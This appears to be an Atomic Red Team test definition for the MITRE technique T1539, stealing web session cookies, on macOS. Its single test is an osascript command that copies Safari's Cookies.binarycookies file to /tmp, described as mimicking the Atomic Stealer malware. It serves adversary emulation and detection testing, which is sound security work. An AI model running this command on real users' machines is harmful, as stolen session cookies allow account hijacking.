attack_technique: T1539
display_name: Steal Web Session Cookie
atomic_tests:
- name: Copy Safari BinaryCookies
  auto_generated_guid: 019a8de9-49b4-7094-989f-ab2285eeb0ab
  description: This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
  supported_platforms:
  - macos
  input_arguments:
    destination_path:
      description: Parameter for destination_path
      type: string
      default: /tmp
  executor:
    name: sh
    elevation_required: false
    command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
